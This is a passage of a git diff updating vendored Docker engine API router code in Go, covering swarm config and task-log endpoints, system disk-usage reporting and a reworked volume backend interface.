+	GetConfigs(opts basictypes.ConfigListOptions) ([]types.Config, error)
+	CreateConfig(s types.ConfigSpec) (string, error)
+	RemoveConfig(id string) error
+	GetConfig(id string) (types.Config, error)
+	UpdateConfig(idOrName string, version uint64, spec types.ConfigSpec) error
 }
diff --git a/vendor/github.com/docker/docker/api/server/router/swarm/cluster.go b/vendor/github.com/docker/docker/api/server/router/swarm/cluster.go
index e2d5ad19b8..52f950a3a9 100644
--- a/vendor/github.com/docker/docker/api/server/router/swarm/cluster.go
+++ b/vendor/github.com/docker/docker/api/server/router/swarm/cluster.go
@@ -1,4 +1,4 @@
-package swarm
+package swarm // import "github.com/docker/docker/api/server/router/swarm"
 
 import "github.com/docker/docker/api/server/router"
 
@@ -31,22 +31,33 @@ func (sr *swarmRouter) initRoutes() {
 		router.NewGetRoute("/swarm/unlockkey", sr.getUnlockKey),
 		router.NewPostRoute("/swarm/update", sr.updateCluster),
 		router.NewPostRoute("/swarm/unlock", sr.unlockCluster),
+
 		router.NewGetRoute("/services", sr.getServices),
 		router.NewGetRoute("/services/{id}", sr.getService),
 		router.NewPostRoute("/services/create", sr.createService),
 		router.NewPostRoute("/services/{id}/update", sr.updateService),
 		router.NewDeleteRoute("/services/{id}", sr.removeService),
-		router.Experimental(router.Cancellable(router.NewGetRoute("/services/{id}/logs", sr.getServiceLogs))),
+		router.NewGetRoute("/services/{id}/logs", sr.getServiceLogs, router.WithCancel),
+
 		router.NewGetRoute("/nodes", sr.getNodes),
 		router.NewGetRoute("/nodes/{id}", sr.getNode),
 		router.NewDeleteRoute("/nodes/{id}", sr.removeNode),
 		router.NewPostRoute("/nodes/{id}/update", sr.updateNode),
+
 		router.NewGetRoute("/tasks", sr.getTasks),
 		router.NewGetRoute("/tasks/{id}", sr.getTask),
+		router.NewGetRoute("/tasks/{id}/logs", sr.getTaskLogs, router.WithCancel),
+
 		router.NewGetRoute("/secrets", sr.getSecrets),
 		router.NewPostRoute("/secrets/create", sr.createSecret),
 		router.NewDeleteRoute("/secrets/{id}", sr.removeSecret),
 		router.NewGetRoute("/secrets/{id}", sr.getSecret),
 		router.NewPostRoute("/secrets/{id}/update", sr.updateSecret),
+
+		router.NewGetRoute("/configs", sr.getConfigs),
+		router.NewPostRoute("/configs/create", sr.createConfig),
+		router.NewDeleteRoute("/configs/{id}", sr.removeConfig),
+		router.NewGetRoute("/configs/{id}", sr.getConfig),
+		router.NewPostRoute("/configs/{id}/update", sr.updateConfig),
 	}
 }
diff --git a/vendor/github.com/docker/docker/api/server/router/swarm/cluster_routes.go b/vendor/github.com/docker/docker/api/server/router/swarm/cluster_routes.go
index fe976434bc..a702488602 100644
--- a/vendor/github.com/docker/docker/api/server/router/swarm/cluster_routes.go
+++ b/vendor/github.com/docker/docker/api/server/router/swarm/cluster_routes.go
@@ -1,19 +1,21 @@
-package swarm
+package swarm // import "github.com/docker/docker/api/server/router/swarm"
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 	"net/http"
 	"strconv"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/errors"
 	"github.com/docker/docker/api/server/httputils"
 	basictypes "github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/backend"
 	"github.com/docker/docker/api/types/filters"
 	types "github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/errdefs"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 func (sr *swarmRouter) initCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
@@ -65,7 +67,8 @@ func (sr *swarmRouter) updateCluster(ctx context.Context, w http.ResponseWriter,
 	rawVersion := r.URL.Query().Get("version")
 	version, err := strconv.ParseUint(rawVersion, 10, 64)
 	if err != nil {
-		return fmt.Errorf("Invalid swarm version '%s': %s", rawVersion, err.Error())
+		err := fmt.Errorf("invalid swarm version '%s': %v", rawVersion, err)
+		return errdefs.InvalidParameter(err)
 	}
 
 	var flags types.UpdateFlags
@@ -73,7 +76,8 @@ func (sr *swarmRouter) updateCluster(ctx context.Context, w http.ResponseWriter,
 	if value := r.URL.Query().Get("rotateWorkerToken"); value != "" {
 		rot, err := strconv.ParseBool(value)
 		if err != nil {
-			return fmt.Errorf("invalid value for rotateWorkerToken: %s", value)
+			err := fmt.Errorf("invalid value for rotateWorkerToken: %s", value)
+			return errdefs.InvalidParameter(err)
 		}
 
 		flags.RotateWorkerToken = rot
@@ -82,7 +86,8 @@ func (sr *swarmRouter) updateCluster(ctx context.Context, w http.ResponseWriter,
 	if value := r.URL.Query().Get("rotateManagerToken"); value != "" {
 		rot, err := strconv.ParseBool(value)
 		if err != nil {
-			return fmt.Errorf("invalid value for rotateManagerToken: %s", value)
+			err := fmt.Errorf("invalid value for rotateManagerToken: %s", value)
+			return errdefs.InvalidParameter(err)
 		}
 
 		flags.RotateManagerToken = rot
@@ -91,7 +96,7 @@ func (sr *swarmRouter) updateCluster(ctx context.Context, w http.ResponseWriter,
 	if value := r.URL.Query().Get("rotateManagerUnlockKey"); value != "" {
 		rot, err := strconv.ParseBool(value)
 		if err != nil {
-			return fmt.Errorf("invalid value for rotateManagerUnlockKey: %s", value)
+			return errdefs.InvalidParameter(fmt.Errorf("invalid value for rotateManagerUnlockKey: %s", value))
 		}
 
 		flags.RotateManagerUnlockKey = rot
@@ -133,9 +138,9 @@ func (sr *swarmRouter) getServices(ctx context.Context, w http.ResponseWriter, r
 	if err := httputils.ParseForm(r); err != nil {
 		return err
 	}
-	filter, err := filters.FromParam(r.Form.Get("filters"))
+	filter, err := filters.FromJSON(r.Form.Get("filters"))
 	if err != nil {
-		return err
+		return errdefs.InvalidParameter(err)
 	}
 
 	services, err := sr.backend.GetServices(basictypes.ServiceListOptions{Filters: filter})
@@ -148,7 +153,17 @@ func (sr *swarmRouter) getServices(ctx context.Context, w http.ResponseWriter, r
 }
 
 func (sr *swarmRouter) getService(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
-	service, err := sr.backend.GetService(vars["id"])
+	var insertDefaults bool
+	if value := r.URL.Query().Get("insertDefaults"); value != "" {
+		var err error
+		insertDefaults, err = strconv.ParseBool(value)
+		if err != nil {
+			err := fmt.Errorf("invalid value for insertDefaults: %s", value)
+			return errors.Wrapf(errdefs.InvalidParameter(err), "invalid value for insertDefaults: %s", value)
+		}
+	}
+
+	service, err := sr.backend.GetService(vars["id"], insertDefaults)
 	if err != nil {
 		logrus.Errorf("Error getting service %s: %v", vars["id"], err)
 		return err
@@ -165,8 +180,13 @@ func (sr *swarmRouter) createService(ctx context.Context, w http.ResponseWriter,
 
 	// Get returns "" if the header does not exist
 	encodedAuth := r.Header.Get("X-Registry-Auth")
+	cliVersion := r.Header.Get("version")
+	queryRegistry := false
+	if cliVersion != "" && versions.LessThan(cliVersion, "1.30") {
+		queryRegistry = true
+	}
 
-	resp, err := sr.backend.CreateService(service, encodedAuth)
+	resp, err := sr.backend.CreateService(service, encodedAuth, queryRegistry)
 	if err != nil {
 		logrus.Errorf("Error creating service %s: %v", service.Name, err)
 		return err
@@ -184,15 +204,23 @@ func (sr *swarmRouter) updateService(ctx context.Context, w http.ResponseWriter,
 	rawVersion := r.URL.Query().Get("version")
 	version, err := strconv.ParseUint(rawVersion, 10, 64)
 	if err != nil {
-		return fmt.Errorf("Invalid service version '%s': %s", rawVersion, err.Error())
+		err := fmt.Errorf("invalid service version '%s': %v", rawVersion, err)
+		return errdefs.InvalidParameter(err)
 	}
 
-	// Get returns "" if the header does not exist
-	encodedAuth := r.Header.Get("X-Registry-Auth")
+	var flags basictypes.ServiceUpdateOptions
 
-	registryAuthFrom := r.URL.Query().Get("registryAuthFrom")
+	// Get returns "" if the header does not exist
+	flags.EncodedRegistryAuth = r.Header.Get("X-Registry-Auth")
+	flags.RegistryAuthFrom = r.URL.Query().Get("registryAuthFrom")
+	flags.Rollback = r.URL.Query().Get("rollback")
+	cliVersion := r.Header.Get("version")
+	queryRegistry := false
+	if cliVersion != "" && versions.LessThan(cliVersion, "1.30") {
+		queryRegistry = true
+	}
 
-	resp, err := sr.backend.UpdateService(vars["id"], version, service, encodedAuth, registryAuthFrom)
+	resp, err := sr.backend.UpdateService(vars["id"], version, service, flags, queryRegistry)
 	if err != nil {
 		logrus.Errorf("Error updating service %s: %v", vars["id"], err)
 		return err
@@ -208,60 +236,35 @@ func (sr *swarmRouter) removeService(ctx context.Context, w http.ResponseWriter,
 	return nil
 }
 
-func (sr *swarmRouter) getServiceLogs(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+func (sr *swarmRouter) getTaskLogs(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 	if err := httputils.ParseForm(r); err != nil {
 		return err
 	}
 
-	// Args are validated before the stream starts because when it starts we're
-	// sending HTTP 200 by writing an empty chunk of data to tell the client that
-	// daemon is going to stream. By sending this initial HTTP 200 we can't report
-	// any error after the stream starts (i.e. container not found, wrong parameters)
-	// with the appropriate status code.
-	stdout, stderr := httputils.BoolValue(r, "stdout"), httputils.BoolValue(r, "stderr")
-	if !(stdout || stderr) {
-		return fmt.Errorf("Bad parameters: you must choose at least one stream")
-	}
-
-	serviceName := vars["id"]
-	logsConfig := &backend.ContainerLogsConfig{
-		ContainerLogsOptions: basictypes.ContainerLogsOptions{
-			Follow:     httputils.BoolValue(r, "follow"),
-			Timestamps: httputils.BoolValue(r, "timestamps"),
-			Since:      r.Form.Get("since"),
-			Tail:       r.Form.Get("tail"),
-			ShowStdout: stdout,
-			ShowStderr: stderr,
-			Details:    httputils.BoolValue(r, "details"),
-		},
-		OutStream: w,
-	}
-
-	if logsConfig.Details {
-		return fmt.Errorf("Bad parameters: details is not currently supported")
-	}
-
-	chStarted := make(chan struct{})
-	if err := sr.backend.ServiceLogs(ctx, serviceName, logsConfig, chStarted); err != nil {
-		select {
-		case <-chStarted:
-			// The client may be expecting all of the data we're sending to
-			// be multiplexed, so send it through OutStream, which will
-			// have been set up to handle that if needed.
-			fmt.Fprintf(logsConfig.OutStream, "Error grabbing service logs: %v\n", err)
-		default:
-			return err
-		}
+	// make a selector to pass to the helper function
+	selector := &backend.LogSelector{
+		Tasks: []string{vars["id"]},
 	}
+	return sr.swarmLogs(ctx, w, r, selector)
+}
 
-	return nil
+func (sr *swarmRouter) getServiceLogs(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	// make a selector to pass to the helper function
+	selector := &backend.LogSelector{
+		Services: []string{vars["id"]},
+	}
+	return sr.swarmLogs(ctx, w, r, selector)
 }
 
 func (sr *swarmRouter) getNodes(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 	if err := httputils.ParseForm(r); err != nil {
 		return err
 	}
-	filter, err := filters.FromParam(r.Form.Get("filters"))
+	filter, err := filters.FromJSON(r.Form.Get("filters"))
 	if err != nil {
 		return err
 	}
@@ -294,7 +297,8 @@ func (sr *swarmRouter) updateNode(ctx context.Context, w http.ResponseWriter, r
 	rawVersion := r.URL.Query().Get("version")
 	version, err := strconv.ParseUint(rawVersion, 10, 64)
 	if err != nil {
-		return fmt.Errorf("Invalid node version '%s': %s", rawVersion, err.Error())
+		err := fmt.Errorf("invalid node version '%s': %v", rawVersion, err)
+		return errdefs.InvalidParameter(err)
 	}
 
 	if err := sr.backend.UpdateNode(vars["id"], version, node); err != nil {
@@ -322,7 +326,7 @@ func (sr *swarmRouter) getTasks(ctx context.Context, w http.ResponseWriter, r *h
 	if err := httputils.ParseForm(r); err != nil {
 		return err
 	}
-	filter, err := filters.FromParam(r.Form.Get("filters"))
+	filter, err := filters.FromJSON(r.Form.Get("filters"))
 	if err != nil {
 		return err
 	}
@@ -350,7 +354,7 @@ func (sr *swarmRouter) getSecrets(ctx context.Context, w http.ResponseWriter, r
 	if err := httputils.ParseForm(r); err != nil {
 		return err
 	}
-	filters, err := filters.FromParam(r.Form.Get("filters"))
+	filters, err := filters.FromJSON(r.Form.Get("filters"))
 	if err != nil {
 		return err
 	}
@@ -368,6 +372,10 @@ func (sr *swarmRouter) createSecret(ctx context.Context, w http.ResponseWriter,
 	if err := json.NewDecoder(r.Body).Decode(&secret); err != nil {
 		return err
 	}
+	version := httputils.VersionFromContext(ctx)
+	if secret.Templating != nil && versions.LessThan(version, "1.37") {
+		return errdefs.InvalidParameter(errors.Errorf("secret templating is not supported on the specified API version: %s", version))
+	}
 
 	id, err := sr.backend.CreateSecret(secret)
 	if err != nil {
@@ -400,19 +408,87 @@ func (sr *swarmRouter) getSecret(ctx context.Context, w http.ResponseWriter, r *
 func (sr *swarmRouter) updateSecret(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 	var secret types.SecretSpec
 	if err := json.NewDecoder(r.Body).Decode(&secret); err != nil {
-		return errors.NewBadRequestError(err)
+		return errdefs.InvalidParameter(err)
 	}
 
 	rawVersion := r.URL.Query().Get("version")
 	version, err := strconv.ParseUint(rawVersion, 10, 64)
 	if err != nil {
-		return errors.NewBadRequestError(fmt.Errorf("invalid secret version"))
+		return errdefs.InvalidParameter(fmt.Errorf("invalid secret version"))
 	}
 
 	id := vars["id"]
-	if err := sr.backend.UpdateSecret(id, version, secret); err != nil {
+	return sr.backend.UpdateSecret(id, version, secret)
+}
+
+func (sr *swarmRouter) getConfigs(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+	filters, err := filters.FromJSON(r.Form.Get("filters"))
+	if err != nil {
+		return err
+	}
+
+	configs, err := sr.backend.GetConfigs(basictypes.ConfigListOptions{Filters: filters})
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, configs)
+}
+
+func (sr *swarmRouter) createConfig(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var config types.ConfigSpec
+	if err := json.NewDecoder(r.Body).Decode(&config); err != nil {
+		return err
+	}
+
+	version := httputils.VersionFromContext(ctx)
+	if config.Templating != nil && versions.LessThan(version, "1.37") {
+		return errdefs.InvalidParameter(errors.Errorf("config templating is not supported on the specified API version: %s", version))
+	}
+
+	id, err := sr.backend.CreateConfig(config)
+	if err != nil {
 		return err
 	}
 
+	return httputils.WriteJSON(w, http.StatusCreated, &basictypes.ConfigCreateResponse{
+		ID: id,
+	})
+}
+
+func (sr *swarmRouter) removeConfig(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := sr.backend.RemoveConfig(vars["id"]); err != nil {
+		return err
+	}
+	w.WriteHeader(http.StatusNoContent)
+
 	return nil
 }
+
+func (sr *swarmRouter) getConfig(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	config, err := sr.backend.GetConfig(vars["id"])
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusOK, config)
+}
+
+func (sr *swarmRouter) updateConfig(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	var config types.ConfigSpec
+	if err := json.NewDecoder(r.Body).Decode(&config); err != nil {
+		return errdefs.InvalidParameter(err)
+	}
+
+	rawVersion := r.URL.Query().Get("version")
+	version, err := strconv.ParseUint(rawVersion, 10, 64)
+	if err != nil {
+		return errdefs.InvalidParameter(fmt.Errorf("invalid config version"))
+	}
+
+	id := vars["id"]
+	return sr.backend.UpdateConfig(id, version, config)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/swarm/helpers.go b/vendor/github.com/docker/docker/api/server/router/swarm/helpers.go
new file mode 100644
index 0000000000..1f57074f92
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/swarm/helpers.go
@@ -0,0 +1,66 @@
+package swarm // import "github.com/docker/docker/api/server/router/swarm"
+
+import (
+	"context"
+	"fmt"
+	"io"
+	"net/http"
+
+	"github.com/docker/docker/api/server/httputils"
+	basictypes "github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+)
+
+// swarmLogs takes an http response, request, and selector, and writes the logs
+// specified by the selector to the response
+func (sr *swarmRouter) swarmLogs(ctx context.Context, w io.Writer, r *http.Request, selector *backend.LogSelector) error {
+	// Args are validated before the stream starts because when it starts we're
+	// sending HTTP 200 by writing an empty chunk of data to tell the client that
+	// daemon is going to stream. By sending this initial HTTP 200 we can't report
+	// any error after the stream starts (i.e. container not found, wrong parameters)
+	// with the appropriate status code.
+	stdout, stderr := httputils.BoolValue(r, "stdout"), httputils.BoolValue(r, "stderr")
+	if !(stdout || stderr) {
+		return fmt.Errorf("Bad parameters: you must choose at least one stream")
+	}
+
+	// there is probably a neater way to manufacture the ContainerLogsOptions
+	// struct, probably in the caller, to eliminate the dependency on net/http
+	logsConfig := &basictypes.ContainerLogsOptions{
+		Follow:     httputils.BoolValue(r, "follow"),
+		Timestamps: httputils.BoolValue(r, "timestamps"),
+		Since:      r.Form.Get("since"),
+		Tail:       r.Form.Get("tail"),
+		ShowStdout: stdout,
+		ShowStderr: stderr,
+		Details:    httputils.BoolValue(r, "details"),
+	}
+
+	tty := false
+	// checking for whether logs are TTY involves iterating over every service
+	// and task. idk if there is a better way
+	for _, service := range selector.Services {
+		s, err := sr.backend.GetService(service, false)
+		if err != nil {
+			// maybe should return some context with this error?
+			return err
+		}
+		tty = (s.Spec.TaskTemplate.ContainerSpec != nil && s.Spec.TaskTemplate.ContainerSpec.TTY) || tty
+	}
+	for _, task := range selector.Tasks {
+		t, err := sr.backend.GetTask(task)
+		if err != nil {
+			// as above
+			return err
+		}
+		tty = t.Spec.ContainerSpec.TTY || tty
+	}
+
+	msgs, err := sr.backend.ServiceLogs(ctx, selector, logsConfig)
+	if err != nil {
+		return err
+	}
+
+	httputils.WriteLogStream(ctx, w, msgs, logsConfig, !tty)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/system/backend.go b/vendor/github.com/docker/docker/api/server/router/system/backend.go
index 6946c4e2d1..f5d2d98101 100644
--- a/vendor/github.com/docker/docker/api/server/router/system/backend.go
+++ b/vendor/github.com/docker/docker/api/server/router/system/backend.go
@@ -1,12 +1,13 @@
-package system
+package system // import "github.com/docker/docker/api/server/router/system"
 
 import (
+	"context"
 	"time"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/events"
 	"github.com/docker/docker/api/types/filters"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/api/types/swarm"
 )
 
 // Backend is the methods that need to be implemented to provide
@@ -14,8 +15,14 @@ import (
 type Backend interface {
 	SystemInfo() (*types.Info, error)
 	SystemVersion() types.Version
-	SystemDiskUsage() (*types.DiskUsage, error)
+	SystemDiskUsage(ctx context.Context) (*types.DiskUsage, error)
 	SubscribeToEvents(since, until time.Time, ef filters.Args) ([]events.Message, chan interface{})
 	UnsubscribeFromEvents(chan interface{})
 	AuthenticateToRegistry(ctx context.Context, authConfig *types.AuthConfig) (string, string, error)
 }
+
+// ClusterBackend is all the methods that need to be implemented
+// to provide cluster system specific functionality.
+type ClusterBackend interface {
+	Info() swarm.Info
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/system/system.go b/vendor/github.com/docker/docker/api/server/router/system/system.go
index ed23d3bdee..11370584ef 100644
--- a/vendor/github.com/docker/docker/api/server/router/system/system.go
+++ b/vendor/github.com/docker/docker/api/server/router/system/system.go
@@ -1,32 +1,37 @@
-package system
+package system // import "github.com/docker/docker/api/server/router/system"
 
 import (
 	"github.com/docker/docker/api/server/router"
-	"github.com/docker/docker/daemon/cluster"
+	buildkit "github.com/docker/docker/builder/builder-next"
+	"github.com/docker/docker/builder/fscache"
 )
 
 // systemRouter provides information about the Docker system overall.
 // It gathers information about host, daemon and container events.
 type systemRouter struct {
-	backend         Backend
-	clusterProvider *cluster.Cluster
-	routes          []router.Route
+	backend Backend
+	cluster ClusterBackend
+	routes  []router.Route
+	fscache *fscache.FSCache // legacy
+	builder *buildkit.Builder
 }
 
 // NewRouter initializes a new system router
-func NewRouter(b Backend, c *cluster.Cluster) router.Router {
+func NewRouter(b Backend, c ClusterBackend, fscache *fscache.FSCache, builder *buildkit.Builder) router.Router {
 	r := &systemRouter{
-		backend:         b,
-		clusterProvider: c,
+		backend: b,
+		cluster: c,
+		fscache: fscache,
+		builder: builder,
 	}
 
 	r.routes = []router.Route{
 		router.NewOptionsRoute("/{anyroute:.*}", optionsHandler),
 		router.NewGetRoute("/_ping", pingHandler),
-		router.Cancellable(router.NewGetRoute("/events", r.getEvents)),
+		router.NewGetRoute("/events", r.getEvents, router.WithCancel),
 		router.NewGetRoute("/info", r.getInfo),
 		router.NewGetRoute("/version", r.getVersion),
-		router.NewGetRoute("/system/df", r.getDiskUsage),
+		router.NewGetRoute("/system/df", r.getDiskUsage, router.WithCancel),
 		router.NewPostRoute("/auth", r.postAuth),
 	}
 
diff --git a/vendor/github.com/docker/docker/api/server/router/system/system_routes.go b/vendor/github.com/docker/docker/api/server/router/system/system_routes.go
index 0d851b684a..82b649e98f 100644
--- a/vendor/github.com/docker/docker/api/server/router/system/system_routes.go
+++ b/vendor/github.com/docker/docker/api/server/router/system/system_routes.go
@@ -1,14 +1,12 @@
-package system
+package system // import "github.com/docker/docker/api/server/router/system"
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 	"net/http"
 	"time"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api"
-	"github.com/docker/docker/api/errors"
 	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/events"
@@ -17,7 +15,9 @@ import (
 	timetypes "github.com/docker/docker/api/types/time"
 	"github.com/docker/docker/api/types/versions"
 	"github.com/docker/docker/pkg/ioutils"
-	"golang.org/x/net/context"
+	pkgerrors "github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sync/errgroup"
 )
 
 func optionsHandler(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
@@ -35,8 +35,8 @@ func (s *systemRouter) getInfo(ctx context.Context, w http.ResponseWriter, r *ht
 	if err != nil {
 		return err
 	}
-	if s.clusterProvider != nil {
-		info.Swarm = s.clusterProvider.Info()
+	if s.cluster != nil {
+		info.Swarm = s.cluster.Info()
 	}
 
 	if versions.LessThan(httputils.VersionFromContext(ctx), "1.25") {
@@ -65,20 +65,64 @@ func (s *systemRouter) getInfo(ctx context.Context, w http.ResponseWriter, r *ht
 
 func (s *systemRouter) getVersion(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 	info := s.backend.SystemVersion()
-	info.APIVersion = api.DefaultVersion
 
 	return httputils.WriteJSON(w, http.StatusOK, info)
 }
 
 func (s *systemRouter) getDiskUsage(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
-	du, err := s.backend.SystemDiskUsage()
-	if err != nil {
+	eg, ctx := errgroup.WithContext(ctx)
+
+	var du *types.DiskUsage
+	eg.Go(func() error {
+		var err error
+		du, err = s.backend.SystemDiskUsage(ctx)
+		return err
+	})
+
+	var builderSize int64 // legacy
+	eg.Go(func() error {
+		var err error
+		builderSize, err = s.fscache.DiskUsage(ctx)
+		if err != nil {
+			return pkgerrors.Wrap(err, "error getting fscache build cache usage")
+		}
+		return nil
+	})
+
+	var buildCache []*types.BuildCache
+	eg.Go(func() error {
+		var err error
+		buildCache, err = s.builder.DiskUsage(ctx)
+		if err != nil {
+			return pkgerrors.Wrap(err, "error getting build cache usage")
+		}
+		return nil
+	})
+
+	if err := eg.Wait(); err != nil {
 		return err
 	}
 
+	for _, b := range buildCache {
+		builderSize += b.Size
+	}
+
+	du.BuilderSize = builderSize
+	du.BuildCache = buildCache
+
 	return httputils.WriteJSON(w, http.StatusOK, du)
 }
 
+type invalidRequestError struct {
+	Err error
+}
+
+func (e invalidRequestError) Error() string {
+	return e.Err.Error()
+}
+
+func (e invalidRequestError) InvalidParameter() {}
+
 func (s *systemRouter) getEvents(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 	if err := httputils.ParseForm(r); err != nil {
 		return err
@@ -99,7 +143,7 @@ func (s *systemRouter) getEvents(ctx context.Context, w http.ResponseWriter, r *
 	)
 	if !until.IsZero() {
 		if until.Before(since) {
-			return errors.NewBadRequestError(fmt.Errorf("`since` time (%s) cannot be after `until` time (%s)", r.Form.Get("since"), r.Form.Get("until")))
+			return invalidRequestError{fmt.Errorf("`since` time (%s) cannot be after `until` time (%s)", r.Form.Get("since"), r.Form.Get("until"))}
 		}
 
 		now := time.Now()
@@ -108,11 +152,11 @@ func (s *systemRouter) getEvents(ctx context.Context, w http.ResponseWriter, r *
 
 		if !onlyPastEvents {
 			dur := until.Sub(now)
-			timeout = time.NewTimer(dur).C
+			timeout = time.After(dur)
 		}
 	}
 
-	ef, err := filters.FromParam(r.Form.Get("filters"))
+	ef, err := filters.FromJSON(r.Form.Get("filters"))
 	if err != nil {
 		return err
 	}
diff --git a/vendor/github.com/docker/docker/api/server/router/volume/backend.go b/vendor/github.com/docker/docker/api/server/router/volume/backend.go
index 180c06e5d3..31558c1789 100644
--- a/vendor/github.com/docker/docker/api/server/router/volume/backend.go
+++ b/vendor/github.com/docker/docker/api/server/router/volume/backend.go
@@ -1,6 +1,9 @@
-package volume
+package volume // import "github.com/docker/docker/api/server/router/volume"
 
 import (
+	"context"
+
+	"github.com/docker/docker/volume/service/opts"
 	// TODO return types need to be refactored into pkg
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
@@ -9,9 +12,9 @@ import (
 // Backend is the methods that need to be implemented to provide
 // volume specific functionality
 type Backend interface {
-	Volumes(filter string) ([]*types.Volume, []string, error)
-	VolumeInspect(name string) (*types.Volume, error)
-	VolumeCreate(name, driverName string, opts, labels map[string]string) (*types.Volume, error)
-	VolumeRm(name string, force bool) error
-	VolumesPrune(pruneFilters filters.Args) (*types.VolumesPruneReport, error)
+	List(ctx context.Context, filter filters.Args) ([]*types.Volume, []string, error)
+	Get(ctx context.Context, name string, opts ...opts.GetOption) (*types.Volume, error)
+	Create(ctx context.Context, name, driverName string, opts ...opts.CreateOption) (*types.Volume, error)
+	Remove(ctx context.Context, name string, opts ...opts.RemoveOption) error
+	Prune(ctx context.Context, pruneFilters filters.Args) (*types.VolumesPruneReport, error)
 }
diff --git a/vendor/github.com/docker/docker/api/server/router/volume/volume.go b/vendor/github.com/docker/docker/api/server/router/volume/volume.go
index 4e9f972a69..04f365e370 100644
--- a/vendor/github.com/docker/docker/api/server/router/volume/volume.go
+++ b/vendor/github.com/docker/docker/api/server/router/volume/volume.go
@@ -1,4 +1,4 @@
-package volume
+package volume // import "github.com/docker/docker/api/server/router/volume"
 
 import "github.com/docker/docker/api/server/router"
 
@@ -29,7 +29,7 @@ func (r *volumeRouter) initRoutes() {
 		router.NewGetRoute("/volumes/{name:.*}", r.getVolumeByName),
 		// POST
 		router.NewPostRoute("/volumes/create", r.postVolumesCreate),
-		router.NewPostRoute("/volumes/prune", r.postVolumesPrune),
+		router.NewPostRoute("/volumes/prune", r.postVolumesPrune, router.WithCancel),
 		// DELETE
 		router.NewDeleteRoute("/volumes/{name:.*}", r.deleteVolumes),
 	}
diff --git a/vendor/github.com/docker/docker/api/server/router/volume/volume_routes.go b/vendor/github.com/docker/docker/api/server/router/volume/volume_routes.go
index cfd4618a4d..e892d1a524 100644
--- a/vendor/github.com/docker/docker/api/server/router/volume/volume_routes.go
+++ b/vendor/github.com/docker/docker/api/server/router/volume/volume_routes.go
@@ -1,13 +1,17 @@
-package volume
+package volume // import "github.com/docker/docker/api/server/router/volume"
 
 import (
+	"context"
 	"encoding/json"
+	"io"
 	"net/http"
 
 	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/api/types/filters"
 	volumetypes "github.com/docker/docker/api/types/volume"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/volume/service/opts"
+	"github.com/pkg/errors"
 )
 
 func (v *volumeRouter) getVolumesList(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
@@ -15,11 +19,15 @@ func (v *volumeRouter) getVolumesList(ctx context.Context, w http.ResponseWriter
 		return err
 	}
 
-	volumes, warnings, err := v.backend.Volumes(r.Form.Get("filters"))
+	filters, err := filters.FromJSON(r.Form.Get("filters"))
+	if err != nil {
+		return errdefs.InvalidParameter(errors.Wrap(err, "error reading volume filters"))
+	}
+	volumes, warnings, err := v.backend.List(ctx, filters)
 	if err != nil {
 		return err
 	}
-	return httputils.WriteJSON(w, http.StatusOK, &volumetypes.VolumesListOKBody{Volumes: volumes, Warnings: warnings})
+	return httputils.WriteJSON(w, http.StatusOK, &volumetypes.VolumeListOKBody{Volumes: volumes, Warnings: warnings})
 }
 
 func (v *volumeRouter) getVolumeByName(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
@@ -27,7 +35,7 @@ func (v *volumeRouter) getVolumeByName(ctx context.Context, w http.ResponseWrite
 		return err
 	}
 
-	volume, err := v.backend.VolumeInspect(vars["name"])
+	volume, err := v.backend.Get(ctx, vars["name"], opts.WithGetResolveStatus)
 	if err != nil {
 		return err
 	}
@@ -43,12 +51,15 @@ func (v *volumeRouter) postVolumesCreate(ctx context.Context, w http.ResponseWri
 		return err
 	}
 
-	var req volumetypes.VolumesCreateBody
+	var req volumetypes.VolumeCreateBody
 	if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
+		if err == io.EOF {
+			return errdefs.InvalidParameter(errors.New("got EOF while reading request body"))
+		}
 		return err
 	}
 
